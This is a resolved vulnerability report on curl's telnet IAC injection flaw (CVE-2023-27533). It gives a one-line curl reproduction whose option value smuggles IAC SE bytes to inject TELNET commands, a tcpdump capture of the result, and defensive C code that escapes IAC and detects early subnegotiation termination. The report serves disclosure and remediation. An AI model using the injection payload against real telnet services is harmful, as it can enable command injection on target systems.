CVE-2023-27533: Telnet option IAC injection

Low
C
curl
Reported by nyymi

Vulnerability Details

Technical details and impact analysis

Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)
## Summary:

`CURLOPT_TELNETOPTIONS` allows setting various telnet options for the telnet protocol. Due to missing encoding of the "Interpret as Command" (`IAC`, 0xff) character, an attacker who can control these option values can escape out of the telnet subnegotiation and enter arbitrary TELNET commands (*) via the `CURLOPT_TELNETOPTIONS` options. The `TTYPE`, `XDISPLOC` and `NEW_ENV` options are affected.

*) TELNET command refers to "TELNET COMMAND STRUCTURE" in RFC 854.

## Steps To Reproduce:

1. `curl --telnet-option NEW_ENV=a,b$(echo -ne "\xff\xf0INJECTED") telnet://server`

When inspected with tcpdump:

```
20:57:34.454720 IP x.x.x.x.53864 > y.y.y.y.telnet: Flags [P.], seq 17:37, ack 22, win 2058, options [nop,nop,TS val 1459077881 ecr 3403052525], length 20 [telnet SB NEW-ENVIRON IS 0 0x61 0x1 0x62 SE]
	0x0000:  4502 0048 0000 4000 4006 265a XXXX XXXX  E..H..@.@.&ZXXXX
	0x0010:  YYYY YYYY d268 0017 12a4 daa2 6603 9cb6  YYYY.h......f...
	0x0020:  8018 080a f840 0000 0101 080a 56f7 c2f9  ....@.......V...
	0x0030:  cad6 75ed fffa 2700 0061 0162 fff0 494e  ..u...'..a.b..IN
	0x0040:  4a45 4354 4544 fff0                      JECTED..
```

## Remediation

- Double encode "Interpret as Command" (`IAC`) (0xff) if it is encountered when constructing the suboption data to be sent.

## Supporting Material/References:

* RFC 854 - https://www.rfc-editor.org/rfc/rfc854

## Impact

An attacker able to specify `TTYPE`, `XDISPLOC` or `NEW_ENV` values can inject unintended TELNET commands into the telnet connection. Depending on the use case of the telnet protocol, this may allow the attacker to inject commands or other controlling operations. The practical impact is context specific, but in the worst case this could, for example, allow executing arbitrary OS commands on the target system.
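As an added illustration of the remediation above (example code, not curl's own), the C below builds a NEW-ENVIRON subnegotiation with every IAC in the user-supplied name and value doubled, and adds a receiver-side check that flags a subnegotiation whose first unescaped IAC SE is not the final one. The function names and the constructed payload (the report's `a` / `b` IAC SE `INJECTED`) are assumptions of this example.

```c
#include <stddef.h>
/* TELNET command bytes (RFC 854) and NEW-ENVIRON codes (RFC 1572). */
enum { IAC = 0xff, SB = 0xfa, SE = 0xf0, NEW_ENVIRON = 0x27,
       ENV_IS = 0, ENV_VAR = 0, ENV_VALUE = 1 };

/* Append untrusted bytes, doubling IAC (IAC IAC = literal 0xff); keeps 2 bytes free for the closing IAC SE; 0 = overflow. */
static int put_escaped(unsigned char *out, size_t outsz, size_t *pos,
                       const unsigned char *in, size_t len)
{
  for (size_t i = 0; i < len; i++) {
    if (*pos + (in[i] == IAC ? 2u : 1u) + 2 > outsz) return 0;
    out[(*pos)++] = in[i];
    if (in[i] == IAC) out[(*pos)++] = IAC;
  }
  return 1;
}

/* Build IAC SB NEW-ENVIRON IS VAR <name> VALUE <value> IAC SE, escaping both fields. Returns length, or 0 on overflow. */
size_t build_new_env_sb(const unsigned char *name, size_t nlen,
                        const unsigned char *value, size_t vlen,
                        unsigned char *out, size_t outsz)
{
  size_t pos = 0;
  if (outsz < 8) return 0;
  out[pos++] = IAC; out[pos++] = SB; out[pos++] = NEW_ENVIRON;
  out[pos++] = ENV_IS; out[pos++] = ENV_VAR;
  if (!put_escaped(out, outsz, &pos, name, nlen) || pos + 3 > outsz) return 0;
  out[pos++] = ENV_VALUE;
  if (!put_escaped(out, outsz, &pos, value, vlen)) return 0;
  out[pos++] = IAC; out[pos++] = SE;
  return pos;
}

/* Receiver-side check: 1 only if the first unescaped IAC SE is the final two bytes (nothing ended the subnegotiation early). */
int sb_terminates_once(const unsigned char *buf, size_t len)
{
  for (size_t i = 2; i + 1 < len; i++) {        /* skip the leading IAC SB */
    if (buf[i] != IAC) continue;
    if (buf[i + 1] == IAC) { i++; continue; }    /* IAC IAC: literal 0xff */
    return buf[i + 1] == SE && i + 2 == len;
  }
  return 0;
}

/* Constructed payload from the report: name "a", value "b" IAC SE "INJECTED". Returns the escaped length (21) if it passes the check, else 0. */
size_t demo_report_case(void)
{
  unsigned char out[64];
  size_t n = build_new_env_sb((const unsigned char *)"a", 1,
                              (const unsigned char *)"b\xff\xf0INJECTED", 11, out, sizeof out);
  return (n && sb_terminates_once(out, n)) ? n : 0;
}
```

The unescaped form of the same payload is the 20-byte telnet body in the tcpdump capture above, which the check rejects because its first IAC SE sits before `INJECTED`.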

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Weakness

Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)